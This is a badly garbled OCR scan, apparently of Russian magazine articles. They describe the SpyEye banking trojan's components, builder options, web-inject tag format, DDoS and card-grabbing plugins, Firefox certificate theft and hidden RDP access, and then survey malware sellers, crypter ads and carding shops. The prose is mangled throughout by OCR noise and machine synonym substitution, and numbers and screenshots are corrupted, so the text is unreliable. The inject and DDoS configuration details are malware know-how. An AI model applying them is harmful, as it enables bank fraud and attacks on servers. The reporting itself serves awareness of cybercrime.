пр е дс т а вл яет вместе с обой од да н фай л -gа t е.р h р.

078

ХАКЕР

00 / 053/ 00 01

Глаз з ла

СЕРВЕРНАЯ ЧАСТЬ
BackConnect Server (for SOCK55 & FTP). Предн азна чен пользу кого
работы не без; ботами путем SOCKS5 иначе говоря FТР, не без этого

0 ."::1.

ВасkСоппесt-сервер подО С GNU/Liпux .

Collector.

Коллектор представляетсобой черный п од ОС

GNU/ L i пu x, приним ающийжурналы работы отботов.
Протокол, использующийсядля отправки л огов, осно ван
возьми ТСР да носитназвание Sausages. В нем используется
ши фрование да LZ О-компрессия . Д емо н пр оелу шива ет
об пр е деле нн ый п сбойка н а пр е дм ет логов с б от на равно для л а дет равно х во

MySQL. Таким образом, пользу кого его работы сверху сервередолже н
бытьустановлен GNU/Liпux равным образом MySQL. Кроме этого, чтобы его
установки необходим SS Н-д осту п ко серверу.

RDP BackConnect Server. Се рв е р представляетсобой
не без; т а тич ески сграбленный би н арный обложка подОS GNU/ Liпu x.
Демон складирует информацию относительно подключенных клиен т ахти
вMySQL .

- -·--·-...
-------- _
,.._. ____
-·--- --...
я --­

КЛИЕНТСКАЯ ЧАСТЬ
0. FormgrabberCP (Collector"sGUI).Дл автор поиска информа ­
ции на базе коллектора нет перевода интерфейс, сочиненный сверху
языке РНР, во виде панели у пр авле ния фо рмграбб е ра. Панель
у пр авле ния сего ~о ду ля н е пр е дна значена для того того, воеже

находитьсянасервере.Этоклиентскоеприложение.

0. Builder. Программа, создающая

н а базеуказа н ных настроек

з н ачительно вывести размер билда бота.

Encryption kеу-кл юч,

не без; л е усишко тан овки).

кото рым шифруется config.Ьiп.

Clearcookieseverystartup- ecли включено, ведь ботик пр равным образом

Работа модуля
удаленного

Mutexname-и мя

Ключ п рописывается равно во бота .

mutex"a, котяга орый

используется на

рабочего стола

идентификации бота во системе.

каждом запуске !будь ведь вслед за п уск ОС либо — либо после п уск билда бота по­
от л е об н ов л ения) будетуд а л пишущий эти строки ть сооk i еsбрауэеров IE да

а

ЕХЕnаmе -имя файла бота во системе пользователя ! п о­

конеч н ыйехе-файлмалвари. Воттолькочасть изо н и~

Anti-Rapport- этo вделанный модуль, инициативно противо­
д ейс тв ую щий антируткиту RappoгtTгusteeг. В частности,

FF.

FF сейчас запущен, в таком случае cookies н е удалятся, таково
cookiescookies.sqlite.
Delete non-exportaЬie certificates- на криптахранилище
Windows ! сие хранили щ е равным образом испольэуетбрауэер IE) су ществует

Sру Еуеубивает п отоки Rappoгt"a да блокирует записьотладоч ­

необычный молодчик сертифика т ов - н еэкс п ортируемые . П оль зова­

раэличныетроянытипа Zeus"a трудиться безграмотный будут. Тот но

тель может их использовать, хотя их невозможно экспортировать,

н ап рим ер, малограмотный сможетснятьхуки бота подле включенном модуле

скажем, на *.plx, да выслать во коллектор. В этом случае во
SpyEye поглощать реальность отвести совершенно сертификаты сего субчик а.

Aпti-Rappoгt .

В этом случае пользователю ничто больше всего далеко не останется, как бы

screeпs h ots . В ней могутнаходитьсятекстовые файлы со пра­

по новой экспортировать цертификат во криптохра нилищ е . Апри

вилами сбора скри нш отов. Скриншоты снимаются присутствие клике

Если брауэер

на правах FF открываетхэндл сверху обложка базы

ных сообщений во е го базу отчетов. Кроме того, этотмодуль
следитэа целостностью хуков бота . Таким образом, кабы у бота

включен текущий модуль, в таком случае ни антирутки тытип а Rapp oгt"a, ни

RKU,

Screenshots. В каталоге билдера имеется в наличии пап ка

импортеботужесниметфлагнеэкс п ортируемостисертифика­

мыши . Пр равным образом этом на центре скриншота получи и распишись х одится движок мыши .

та, да та каковой сертификатможно будетотправит ь на коллектор.

Фай л правил со дер житс тр оки, каждая с которыхдолжна

Dontsend http-reports-B НТТР -от ч е та х бездна мусора. Та ­

заключать пят ь два метров , разделяемых пр обелами . Формат

ким образом , имеетсмысл отпра вл ятьтолько НТТРS -отчеты

следую щ ий:

!ну равно преимущество НТТР-отчеты сданными Ваsiс-авториэации).

Compressbuild ЬуUРХ- буде

вклю ч ено, ведь билдер сожмет

%URL

билдбот а UРХ"ом . Если используемый кри птор безвыгодный сжимает

МАS К%

%WIDTH%%HEIGHT% %М INIMUM CLICKS%____

%.MINIMUM_$JCQNQ$%

- - - - -..- -..····----..-

первоначальный файл, ведь каста об пци мы важ н а.

Make buildwithoutZLIBsupport- нecмoтpя нате исполь ­
0.0 на FF-инжектах да бери заочно
из-за обнаженно на ка Accept-E ncoding, другие во еб-се рв еры могут
близ идти суженный контентlнапримерgziр, dellate). В этом

Здесь URL_MASK-этo личина

зование протокола НТТР

зит п что до

URL. Е сли п риложение гру­
URL ресурс, п опадаю щ ий подэту маску, в таком случае включается

соответств ую щее принцип отправки ск р ан ш отов. Существ ует
одн а пр облема,с вя эан ная соскриншотами. Б с у будет

случаеSру Еуе испольэуетбиблиотекуzliЬ, с целью распако во ат ь

пр облематичноуэнать, получи какой-нибудь странице со на ершается возглас

контент равным образом проинжектитьего. С этой включенной оп ци ей бил­

!например, ввидутого что-нибудь во браузере можетбыть множеств по отношению

дер генерируетби лд бота кроме п оддер жкиzl iЬ "а. Это сэко номит

вкладок). Дл ваш покорнейший слуга сие го су щес твуют дв а п ара метра: минималь-

а
РаботаFТР
бэкконнект­
сервера

05-16 Кв размера бил д а !если мерять разницусжатых
UРХ"ом билдов) . Однако на случае, даже если придетсжатый ко нтент
во

FF, кавасаки никак не сможете го нагнетать .
Make LITE-config- oп ц ия по части пр еде ля ет, нужно ли охватывать

во со nfig .Ьiптакие вещи, кaкweЬi nj ects, scгee nshot s равным образом плагины

.-....=.".

~- .:.т.

0

.~·~

0

L-.. " ~

"1".:10

(

VIIIШT

q,,::e;;

:tJ """"""

" ~\,SOCКS 0 ~ RDP

v:=

((ii_,~P,

~--""

!кроме customconпectoг.dii) . Д eлo на томишко , аюшки? быть создании
бил ну да бота coпfig . Ьiп ВСЕГДАвшивается во интрузив бота. В свою
очередь, сие влияе т получай размер исполняемого файла ибо та . Пр да
испольэованииэтойопцииботпослеотправкиданныхна

регулятор ботнет а загрузитко нф игурацию с безвыгодный го со во всем
необходимым инструментарием. Такой подступ п озволяет

ХАКЕР

00 / 053/ 0011

079

MALWARE
формграббера , у казав мерка поиска

"GRABBED

Hooked Fun ction :

ОАТА" .-При м. ред.)

Н-анал оги ч ен флагу Lза исключением того, сколько на сгра­

.: t~~~-\

бленноесодержимоеневключаетсясодержимоетегов

• u..t!• ll\l l l llo -

o

··~··-~-····· ·-··-·

..

data

:! t;~:E-=· (-•)

data_before, data_inject, data_after

:::~ ~~:.i"t.~···
l .щ__

..
IJ

~\

Существуеттри не без; итуации близ работе от этими т егами :

• .... tllll

: "f.,.,.__

Ьеfоге равным образом d ata _afte г.

0.

=~:~-···· ·-"" af"

. . . ····

н т~~~
~ ~~----.1111 :·

Если найден контент nо маске data _ befoгe равным образом предмет
тега

•.

»

---··~

----".---...

data_after пус то, в таком случае ... - лодка вставитсодержимо е тега
data_inject П ОСЛЕ data_before.

0.

...,

Если найден контент объединение ма не без; ке data _afteг да начинка

тега data_befoгe пусто, ведь ... -ботвставитсодержимоетега

,.-. ...... " " -

data_inject ДО data_afte г.
0.

Е сли найден контент в области маскам data_before да data_after,
ведь ...- ботзаменитконтент меж дутегами data _ befoгe равным образом
dаtа_аftегвключительно держи содержание тег а data _ iпject.

а
Инжекты
на действии.

На пра кти ке была обнаружена следующая особен н волос
а е равно максимальное наличность кликов-чтобытак другими словами

веб-сервера ВО дnри равно не без; п ользовании НТТР 0.0 [именно эту

`иначе [оnираясь возьми доля кликов да время, nрошедш ее

версию НТТР Sру Еуе ис n ользует чтобы инжектирования страниц

не без; момента загрузки НТТР-ресурса , указа нного во URL_MASK)

на спринклер ре Mozilla Fiгefo x ). На некоторых ресурсах [*

сливать nравило скри н шатав .

веб-сервер возвращал вместе с жатый контент, п ри этом во Content-

Client: Builder:weblnjects. В каталоге билдера nрисут­

css, *.js)

Encoding безграмотный было указано, что-то контентсжа т ый . Приводило

ствует паnка weЬinjects . В ней могут получи и распишись ходиться текстовые

эт по отношению ко тому, зачем браузер распознавал контенттаки х рес у рсов,

файлы со nравилами инжектирования НТТР/НТТРS-ресурсов.

что lnvalid

Форматинжектовтакой но , наравне да про Zeus"a. Однако nоддер­

Несмотря в nодобные проблемы веб-сервера, сие позволено ис ­

живаются малограмотный однако флаги маски set_uгl. Тем безграмотный в меньшей мере nоддержи­

прав ить средствами SpyEye, насчет не без; в таком случае составив пус тое nравило

ваемых флагов вnолне достаточно, пользу кого того с тем апострофировать кого относительно

[с пустымитегами data_befoгe,

nолной совместимости не без; инжектами Zeus"a. В файле nравил

инжектирования

data_inject равным образом dаtа_аftег)для
css- иjs-ресурсов.
Builder:serial.txt. Билде р привязывается ко но л ез н ой

со держатся блоки от четырьмя тегами: set_uгl , data_befoгe,

data_inject, data _afteг[нynлюcтeгdata_end еще, указываю­
щий возьми конецтега вместе с префиксом data_):
set_url
В этомтегеуказывается ма из ка , возьми которой сработаетсоот­

Content, равно ступень от б ражалось некорректно .

части компьютера, а серий ны й штучка ваш брат несомненно ет ра зработчик
вредоносного ПО . Ачтоты хотел: лицензионная nр в рассуждении гра мма!

Client : Builder: collectors.txt. В ката л оге билдера надо
н аходи ться обложка collectoгs .t x t . В обложка дозволено пропи со ать вместе с пи­

ветствующее начало инже ктирова ния. Также наравне да на Zeus"e,

бекмес , каждая строчечка для оторого имеетследующий микроформат [такие

синтаксически поддерживаются такие движимость , в качестве кого « * » равным образом « # ».

со тр оки разделяются Еntег "ами):

Этоттег можетсодержать неодинаковые флаги [по умолчанию
G-означает, что-нибудь инжектированиебудетпроизводиться

iр:рогt- сие IP, возьми котором установлен SpyEye Collectoг
PORT, каковой труба слушает нате предметжурналов
работы . Вместо IP можноуказатьдоменное отчество . Коллектор,

толькодля ресурсов, которые заnрашиваются GЕТ­

во вкусе правило, исnользует тот или другой прославленный , « расnро­

методом.

вместе с траненны й >> nорт [80 не в таком случае — не то 043), понеже во н екоторыхлокальны х

Р-означает, что-то инжектирование хорош делать ся

сетя х маршрутизаторы могут блоки ровать отсылкутрафика

используется знак G):

равно

толькодля ресурсов, которыезаnрашиваются РОSТ­

нанестандартн ые п выработка ы .Вслучаене во озмож ности с прав ки

методом.

данны х путем ранний коллек так р лодка довольно ловчиться отn р авить

L- nред ставляет лицом

символ пользу кого перехвата- граббин ­

данн ые, исnользуя коллекторы, указа нны е ни а [nауза в обществе

га содержимого междутегами data_befoгe да data _ afteг

n по части пыт ками составляет0 , 0 секунды) . Е сли ботик дойдет до самого кон ца

включительно. Пр равно этом сграблен ный конте н тбуд ет

со число «пи» ска да эмпирика с п равитьтак равным образом малограмотный удалось, ведь спирт со х ранит

отграничиваться содержимым тега data_inject. [Сграблен­

экспозе на специальном х ранилище равным образом будетnытаться отnравить

ноесодержимоеможнонайтивпанелиуnравления

документация nри следующей отс ылке логов.

ПЛАГИНЫ ДЛЯ КЛИЕНТА
Дл ваш покорный слуга обеспечения недо со тающей во базовой части клиента

ОТЛИЧИЯ ИНЖЕКТОВ
ОТ НЖЕКТОВ ZEUS"A

SPYEYE

функцианальности из уществуют пл агины. Они как и указыва­
ются во билдере.

Client: Plugins :weьtakes . Плагин weьtakes может исполь­
зова тьсядля п одм е ны содержимого НТТР- равным образом НТТР S -р есурсов
безобращениякоригинальномувеб-серверувбраузерахiЕи

орядок следования тегов data_befoгe ,

data_inject, dаtа_аftег-для SруЕуе "я дьявол
важен да долина а н присутствовать им е нно такой, а в целях Zeus"a невыгодный важен. Zeus п что касается умо л чанию

FF. Конфи гурационный обложка

инжектируетСSS- да JS-контент. Однако, так чтобы нагнетать эдакий контент во

сле дующим образом :

SpyEye, хоть лопни нужно основать прав илотаким образом , дай тебе на теге set_ uгl содержа­
ласьстрока << .css» либо <<.jS>>[в зависимости ото будто контента с целью инжекти нга).
В SpyEye некорректно реализован флагН-в Zeus"e возлюбленный используется к удал ения
НТМL-кода изо сграбленного контента НТТР-ресурса . В SpyEye из п е ц эмблема << # >> ни для волос
аналогичен << * >> [в теге set_uгl). Хотя на Zeus"e сие н е этак равным образом сnецсимвол<< # >> используется что

пла г ина совместим вместе с форматом

п в рассуждении ддель ны х страниц , используемы х Zeus"oм , равно выглядит

entry "WebFakes"
%URL_МASK%

%URL_REDIRECT%%FLAGS% %POST_BLACK_MASK%
%BLOCK_URL%%WEBFAKE_NAME%

%POSJ_WHIТE_MASK%

СИНОНИМ «НОЛЬ ИЛИ ОДИН произвольный СИМВОЛ >> .

080

ХАКЕР

00 / 053/2011

Глаз зла

Мonl~..

0

""

OJ/1 0
061111107

VIRТEST

.fS sJ~\к
D Plualns

FTP BackConnect. Плагин поднимает ПР-сервер нате боте

Crнte r.u ~ s~"J~к

..

~ ~r...

\\. socкs

да nредоставляет проход для немучерез BackConпect-cepвep. В

0

:; """" 0

RDP

!.,.L

!-:JE:

главной п а н е ли управления дано интерфейс, позволяю­
щий изображать оглавление FТР-серверов.

Flles

RDP BackConnect. Плагин поднимает RDP-cepвep равным образом
прокидываетего прежде BackC oпnect - ce pв epa. Также плагин р еа­

Ta sk list
(_Ь ..

l •f• St.t Dtl

00 01·03·1 01\ . SOolt

~

hb

V l!!I X

с целью удаленного использования П К соответственно пр что касается токолу RDP. Ещ е во

нем предусмотрена панельуправления с целью запуска любого

....... ......... ~ ...

v

l"tl•

$1.

лизует организация сокрытого пользователя, кой равным образом нужен

п роцесса через любого пользователя на системе !чтобы дозволено
было соз выкидывать пр об це ссы ото имени оригинального пользо­

вателя!. И уже встроена РогtаЫе-версия TotaiCommaпdeг "a,

0000•00•0000 -00 tOO

.20 0 0·0J·I II Io,]o2 •

"v
v"

загружаемого да з интернетаи вслед п ускаемого непосредственно изо п амяти

!без сохранения нате диск!.
Плагину отнюдь не нужна пере заваливание ОС пользу кого работы .
Плагин включается сквозь главную панельуправления .
Сnисок б от во не возбраняется познать на соответствующем пункте карточка

Вид контроnnера ботнет а

IRDPI. Подключать ся для ботам дозволяется от ста ндартное П О ОС
Windows <<mstsc.exe >> Remote Desktop Conпectioп .
Минусытекущей версии пл аги н а:

С подменой во браузере FF связан единолично нюанс. Ввиду
особеннос тей API библиотеки nspг4, сведения POST-зa npo ca,

несть поддержки х64-систем;

поступающие пользу кого анализа во плагин подмены, ограничены

плагин у нужны полномочия администратора интересах работы;

длиной во 0 Кб. То ес_ть близ составлении правил подмены

безвыгодный п оддерживается Win7 Staгteг !именно Staгteгl;

используются таки е переменные POST-зanpoca, которые

не считая того, принимать плагины про разработчиков равным образом отладки!

входят на первые 0 Кб НТТР- ради проса !включая размер НТТР­
шапкиi.Плагин невыгодный т ребует включения со стороны шаг н ели

ЗАКЛЮЧЕНИЕ

у правления .

После ознакомления вместе с сим зверьком равно егодокументацией

DDoS. Плагин можетбыть использован, в надежде осуще­

становится ясное дело , сколько п ере д нами - п олноценный насчет ­

от твить DDoS -a тaкy получи и распишись какой сервер. Конфигурация

граммный продукт, взять хоть равным образом пр е дназначенный в целях совершения

плагина имеетследующий вид:

nротивозаконныхдействий.Компьютернаяпреступность

type taгget poгttime.
type taгget рог! time.
tуре-тип DDoS"a. Подд ерж иваются сле дую щишки е:

пере хо дитнановыйуровень не без; воегоразвития.И от пользуемые

s lo w l oгis/ssyn/udp.

зто пугающие тенденции . Уже существуют целые индустрии

taгget-IP либо хостсервера, нате кой осуществляется

в области написанию вирусов, предо оставле ния ботнетов во аренду,

атака.

пр одаже трафика в целях заражения равно усик тановки б от на . Функ­

инструментыисредс тва,разделениеобязанно из тей,сра­
щ ивание не без; организованными преступными группами- всё

рогt - порт, подвергаемый DDoS"y !для UPD DD oS дозволено

ционал SpyEye поражает, а присутствие nодобнойтехнической

выделить О, на выбора случайного порта!.

акт а циигов орито пр офессионализмее горазработчи­

timе-время , на перемещение которого хорош судить -

ков- неудивительно, почто наш брат наблюдаем колос из альный величина

ся DDoS !для UDP/SSYN используются секунды, с целью

числа мошенничества со системами ДБО . Стоимо от ть SpyEye сверху

Slowloгis-минyтыl.

черном рынке колеблется на районе десяткатысяч долларов

В конфигурации плагина не грех обозначить много зада­

ради версию не без; полным набором модулей . Учитывая све р х­

ний получай DDoS lплагин переходитот одного задания ко другому

прибыльность пре сту пн ой исполнитель да сти, которую не запрещается

прогрессивно , безграмотный мно го п через очноl. Дл аз многогрешный ти п а DDoS"a Slowloгis малограмотный

применять вместе с е го через , зто пока что неграмотный беда сколько .

а
А воттак

:J:

создаются

нужно вслед выкидывать портlпоумолчанию используется 00 - ыйl.

самиботы

Плагин требует включения со стороны п анели у пр авления .

Client: Plugins: ссgгаЬЬег. Пл агин занимается сбором

------~-----------

-----

информации в рассуждении банковских картах, анализируя РОSТ-запросы

- - - - - - -- -- -- -- - -

приложений . Дл ядетектированияномеровбанковскихкарт
используется Luhn algoгithm. Если нашелся валидный факс

Spy

карты, так поголовно POST-зanpoc отсылается во коллектор. Найти
не без; грабл ен ны е СС дозволено чрез подобающий интерфейс

Еуе . .э

поискавпанелиуправленияформграббера .

ffcertgrabber. Ба зо вая

колтун пл ектация Spy Eye занима­

lli! djf•hh99399gh4rha Г.hdsfoh

ется хи щени ем сертификатовтолько с криптохранилища
Clear cooki.,- e very startup (IE, FF):

г

f! A•6-JШs!od • P

р

FF "-"blnj.cts: f;i

Windows. Однако Fiгefox исnользует собст венное хра нилище

Delete

сертифИкатов . В рычаги из сим yes ть специально предназначенный плагиндля

Oont send http·reports •

г

Compгess

г

noro-export~Ы•

certific01tes:

хи щ ения сертификатов с FF. Предусмотрен наем шаг ролей
п касательно словарю на случае, буде возьми тавр установле н мас т ер­

b\.llfd

Ьу

UPX v3 .07w :

0

фраза . В конфигурации плагиналишь однозначение ­
минимальноевремяожиданияпередотправкойсертифи­

катов во труба !указыва е тся на секу нда х ! . Сграбленные
сертификаты имеют платеж FF.

Socks5 BackConnect. Плагин п однимаетSОСКS5-сервер

Make UП ·conflg
(witltout -blttjкts, p/Uf}il"!s

& scrнn.Jtot:s) :

г
: ls yste mS.rvice

сверху боте равным образом предоставляет по сту п для немучерез BackConnectcepвep . В главной nа н ели уnра вления есть интерфейс,

позволяющий отражать не без; nисокдоступны х Socks"oв.

ХАКЕР

00 / 053/ 0011

081

MALWARE

КАК И СКОЛЬКО
ЗАРАБАТЫВАЮТ НАШ
КРИМИНАЛЬНЫЕ
КОЛЛЕГИ?

Баблона малвари

ЭВОЛЮЦИЯ ГРАБЕЖА
В начале 0000 - х гг. ба нкитолько зачин ал идумать что до своей
дьявол лайн овой безопасности, а хаке ры-атом , как бы многоде н ег
из того места дозволено увести. Не соз нательные сам прицел находили

уяз вим ости на сис т емах вслед за регалии ы финансовых онлайн-операций
того либо иного банка, уводили базу карточек равно вам со тавляли ее
н а продажу на откры т ом виде . Н а н е в отдельности -то засекреченных

форумах допускается бы л ос поко й н насчёт прочит ать именатех н есчас т­
ны х,укоторы ху велибанков ск иереквизиты ,иуз натьдр угие
интимные подр наклеп ти. Профе ссио нальны е погрузчик деры сиречь
простодурачки игриво ску палита кого рода информацию,

быстренько печатали необычайный пла ст ик lто естьлевую карточку
из правильной информацией об деньгах) равно шли ради шаг са ть ся на
первоочередной копилка . Болееумные автопластика неграмотный печатали, а за­
ку пали сь вонлайн - мага зи н ах.

Абу зо уе~ойчи вый

0f""i!ii"
*!!lllbl"3"5§*

А б у зо у вместе с tоичивый се 0 >ве р на Кит ае

VPS

• CPU: l"""el

c-2Qv8d Q8200

· ~ : 0CO.ВDORa

0

HDD: noGB SATA

• LAN :

....

*ЧЩМ"Ь§

000МЬ/1

•noo6..oc

• n...... ~ l5P """naoer - &ЕСПААТНО
Любая функция paэpt~weнi!l
PaccwniCil бu nрокем / соксов paspeweнa

MfiiW!Q

Однако ха ляв у начали быст р по части прикрыв ать: вместе с тало появ­
ляться однако значительнее антивирусных решений, которые стали

с.-.-·, ,

__ _"" в рассуждении , · ~ """" wP8•••

на удочку малограмотный токмо для юзе рам, да на да банки. А за сле дние,

o l"to)Jie•eto/lllбoiO..,......,.

за вычетом т ого, не без; т а ли ужес точ а тьдо со т уп ко со воим данным, т в отношении

. .... ~ eor .~

- ~·_,-­
.

ь.n.-т....,;Т"Р8Q108.

естьвзлома ть банксталогораз поперед сложнее .П риэтомпо­

·----

лиция начатки преобразовывать целое свыше внимания получай подо б ные
крими н а льны е активности, что-нибудь прив ело ко книжка у, что-то «заку п

....... ..,.. .. ус-и•

Е МС"

nом..,._..

0\"0I<Тwrto~

~~"t"le200З-Z011

п касательно п ол н ой>> получай очередном хаке рек ом фо р уме был способным обер н уть­

ся встреч ей вместе с пр е дставит елями зако держи , играющими функция
продавцов . На э пирушка волн е за не без; теп е нно стал основывать из ваш покорнейший слуга

потому что ле е расплетенный рынок, со своей спецификой равно спе ци ализа­

Конечно, кипа киберп р есту пни заговор продолжаютэто делать,

ци ейнабанковских тр оя н ахти .

да продуктивность подхода отнюдь не стольвы сока. Р езультативны е

Конечно, ник чуна безграмотный дели сь изначальные почти ходы как
от кимминга, ту п по отношению го взлома банкоматов да пр оче г о, однако во се сие ,

до сути , г рубо да неаккуратно, н е г оворя еще от м, почто хло­
п касательно тно, на правах аллегро п оняли п арни, которые нашли 0001 не без; п особ

удары паркет у ча ю т ся р е дк о, около э книжка гений ные н е г что касается дяи у личина е л и,

во вкусе дозволяется от выделывать ибо льш е равным образом лучше.

позволяется хостить целое

этомоченьдешево

ОТЛАЖЕННЫЙ МЕХАНИЗМ
Таким образом, на начинание ста ли тайный подле прогуливаться инди­

гл асн относительно ста ти не без; сокращение е насчёт т << Ла потому что р атории Каспере кого>>, которая

ви дуумы не без; мозгами, которые были готовы р облить д енеж ны ми

внимательноизучаетлюбителей«поломать»банки,за2010

потоками , н касательно н е уме ли число «пи» са ть малварь . В частнос ти , по-под да х

г. ее ана литики добав тож потому что л ее 00тыс . си гнат у р вместе с на ердикт ом

влиянием толкучка ста л специализироваться , п оделившись нате

Тгоjап-Sру. Остальныеданные твоя милость можешь п осмотре ть держи

разные г р у ппы, относительно кото ры х автор сих строк д альше п насчёт г оворим.

Начнем со соз д а т е лей малвари -т ех люд ей, которые

пишут на се вяще да больше, равным образом выш еу помян у тый решение

паче всехдержат р уку н а пульсе. Вся их д еятельнос ть

превалируе т .

напоминает пр оизво д ствен ны й ци кл любого п рограммнога

Отчего? Оттого, чтозло умы шл е нники поняли , ась? п усть

В Китае, как бы видишь,
что такое? приятно . И присутствие

увести всю н полоз н ую информацию вместе с кусок движение пользователя . Со­

со ответствующем таблица е, а налиц отот факт, зачем малвари

а

продукта: равным образом зуче ни е рынк а, соз дани е качественного функ­

л уч ш е соб ирается весь инф об рмация, а дальше п осмотрим, в духе ею

цион а л а, соревнование из конкурентами . Те, кто такой игра стоит свеч вслед за созда ни ем

вос п ользо вать не без; я. Собирать взрывчатка ь ко банковские дан ны е сквозь

экс пл оит-пак ов равно су р овой малвари подобно SpyEye равным образом Zeus"a,

бана льный фишинг, электронную корреспонденцию с банков

тщательно д окуме нтир комфорт изменения, быстренько вносят

во ключе << наша сестра т ут р е шили обновиться, подтвердите данны е

коррективывкод,кактолькоихначинаетдетектировать

счета >> равным образом пр очиелохатр оны на какой-то мо блюститель закона ста ло н е модно.

оный иначе говоря из другой оперы противовирусный вендор, аж добавляют во свою
малварь мини-ан тивир усы, вытирая тем непосредственно ым наи паче
з ло со тны х ко н ку рентов . Причем д елаю т в рассуждении н равно сие н е невыгодно отличается от ради ­

Urist
0Тт1p.i811fti!0 05 ~~fth1011

03 01

01С00тt)8 .

Цена:

Дешевенький

Ze us, SpyEye

равным образом пр очие известные на узких кру гах тулзы не грех ничтоже сумняшеся

козни держитtя стереотипно

оотнет- саежмй .
ПO,._JO Bi"llfПII

а

равно выкл а дывают н а фор рассудок ы п росто этак . Тот а

Наnисан сверху асме .

00% на

прав ского антивируса. Также стоитупомянуть, что такое? хакеры ­
ал ьт руисты во зламы ва корма дорогие творения своих собратьев

ботнет! Никому
отнюдь не надо?

скачать во крякнутом обличье е.

000$

Такч тосо зд ателямтаки хт рояновпри ходитсябо роть ся

0 coo6щe1111ii
Работаем при помощи rарантз .

е щ е да из таким видом нападок, целое момент ул учшая своитво ­

Имеем отзыаы .
ОМата исключительно

рения равным образом вам думывая новые от р е дства вслед за щиты . На стало мозгу на это дело приходит

LR alias Альфа .

Ботнет не возбраняется настроить какдля

DDoS, где-то

равным образом для того заливов да лоадов .

а налогия от китайцами, которые н е щ а бенталь копируютайфоны да

ICO: 094-867-702

двn:.вм

Цвмw •а

a:arpy•w no USA, AU, DE, rт. UK. RU 01 С НГ.
0000 a:arpy•o•:

USA •100$
AU• 03$
DE •120S

ХАКЕР

00 /153/20 01

МАЛВАРЬНАЗАКАЗ,ИЛИСОЗДАЮТ

ЧТО-ТО КРУТОЕ САМИ С НУЛЯ

rт •7os

UK• 08$
RU•SOS
стр :амw снг

ГЕНИИ-ПРОГРАММИСТЫ ИЛИ ПИШУТ

&О$

И НАЧИНАЮТ ПРОДАВАТЬ
083

MALWARE
л о, нужны рекомендации alias инвайты через старожилов . Мо­
Привет sсен . Провожу т есты срмnтора . nоэт011у беататно «:риnтану ваwн файnы

тоестьпосредников ,ко торыеот ве чаютзат~чт~заказав

Крнnтор безвыгодный VВд
Гpynn at

n.."...,o•.-r•n•

Coo6щe>iмl< t

007

Реrио:тр 011 ,...,, ое.о2. 0010
nо..мо••т•"•

""" 09

040

малварьу Васи, твоя милость н е несложно выкинешь деньги, а п олучи шь

Крнnтую OU/EXE

Ес т ~о nоддержка ТLS
Крнnтую гибридные 010дулн,

eaw ехе 01eн.яettfl для дм,

а где-то но сверху цикл

А• ~т.,.•носn" ~ Добавляю вашу да конку либо — либо генерирую домашние .
Penyтau. .. ~ t

07

то, ась? обещает Ва не без; я.
Отдельные индивидуумы занимаю тся созданием ботне­

тов . Их допускается арендоватьдля DdoS "a, про дальнейш е го раз­

С туч1111 безграмотный стесняеМС~~ .

( 0-. · xopowo)

дераторы форумов зачастуютакже играют цена гарантов ,

ICQ 015011
Jabber porir. y 06Sc;.thesecure . Ыz

оратор да сбора данны х не без; ю зе ровенник , к сообразно от ожеледь у ющей продажи ,
с целью организации анонимных прокси-с ер веров равно т . п .

01.03 .2011 ,

Отдельно заточенные товарищи занимаются пои ском

0 ~: 03

уяз возвышение стей вот во всех отношениях да вся. Это самая без шаг сная работа. Ты

Пофнtесн.nи.

конечно знаешьлегитимные ресурсы, которые пр е длага­

Все отnнчно отсту~tивает н отнюдь не nan•щo

07:S

полуют т ебе распадаться найденными уязвимастями после злой гений платно

00. 02. 0"010
rrt : Э:S 0 07

сиречь вслед мелк ую д енежку в угоду таблица получи земле.

Гpynn fltt ПOIIo..I08fltT8JIO

С оо6ще .... tо ,
Реnоарачн• :

Поn~о2о1 атtя•

ДfltltТeii. HO C"Ilo t ~

Но малограмотный вс е но такие альтруисты, особенно приусловии того,

Р 0П"f1" 0 01и• : 0

зачем соз датели экс плоит-паков могутзаплатить вслед за найденн у ю

( 011.- xo p o w o)

уяз вимость несколькодесятковтысяч баксов, когда выговор да д ет

об Оdау-находке во не без; амой священник уляр н ой версии Windows"a.
На ко н е ц, я добрали не без; ьдо те х, кто, собственно, за­

отлнчно IСРиnтануn , нуn евой детеr.т ,

казывает ве сь пирушка - прест уп ников , которые фильтр у корма
Все , оtтора6отеетnо РуиСНГ, nоосннне nонеще ., .. е !

тонны ук взыграла душа енной информации равно выставляют ее сверху продажу

во не без; пециали з ированны х магазинах !см . соответственный
скриншот).
Это дилеры, которые пр едлагают конечным потребите­

а
Как смотри по части

остальные модныедевайсы, тем самым подрывая начинание больших

лям -др угим пр сделал т у пн икам, -д осту п для живым д еньгам.

да успе шны х контор.

Н у ведь поглощать пр актически живым. Пол у чить дост у п ко таким

Очевидно, чтотакие программ е ры не без; тоят намного в большинстве случаев

отзывам , крипт

магазинам со л ож но: приходится фигурировать во т усо вке, рег улярно за­

в сущности

типичногоаналитика на антивирусной компании , притом на пря­

окунаться бери взрослые средства . Пр авда , равным образом предоставляемый

помогает дослужиться nо­

мом смысле. Согласно рассказамне хо роших парок ней , которые

се рвис получай высоте: дать на лапу позволяется по сию пору что-то у годно . Мы уж

ставленных гнусных

целей

а

создают ре альныетроя ны да экс плоит-паки, их недельный за­

на ско ль зь упомянули насчёт том, в чем дело? крадут безвыездно : н омера банков­

работок больше, нежели менструальный у типичноготоп -менеджера на

вместе с ких картспинами равно банковские счета -товар , которым

запа дной компании . Таки елюди ни в жизнь малограмотный перейдут трудиться

ни души н е удиви ть да кто во из вет е активизации киберпо­

во нормальную компаниюдаже руководителями разработки:

лиции порядочно небезаnасен про об налички. Правда , лакомиться

вы чтотолько до со ле того , на правах из танут миллионерами . И есте­

способ зак азать карточку определенного литровка ,

ственно, из тем чтоб безграмотный проявляться вдальнейшем.

определенного типа, н быстро утнапиштим со траны , что-то во шеренга е от л учае на

Гении-пр относительно граммисты иначе пишут малварь получи заказ, иначе говоря

С кидать SpyEye
может любой, кто такой на
состоянии засорить

приводит ко вместе с ильном у снижению градуса опасности !ты,

соз дают как бы крутое самочки вместе с н ульяна да начинают пр одава т ь.

пример , из лышал по части киберполиции Лао са?). Н а з ака з пр о­

разведочный задание на

Д елаю т они сие п о-прежнему чере з тематические форумы,

давецдостанет постоянно чт в рассуждении у годно . Цены демократичные -1 О

Google

всего-навсего попас т ь нате них ныне н е целый ряд вместе с ложнее . Как прави-

% через накануне сту пн ой налички.
Кроме того , дозволено купитьлюбые платные аккаунты-на
рапидшару, во Ж Ж, скай п равным образом проче е. На вирту альны х полках
лежат украденные лицензии с целью со фта , в томик числе , почто са мое

Пр проверка nолноМ версии

сме шн ое, антивир усишко ы !см . скрин ш ото ) , парали илогины ко FТР­

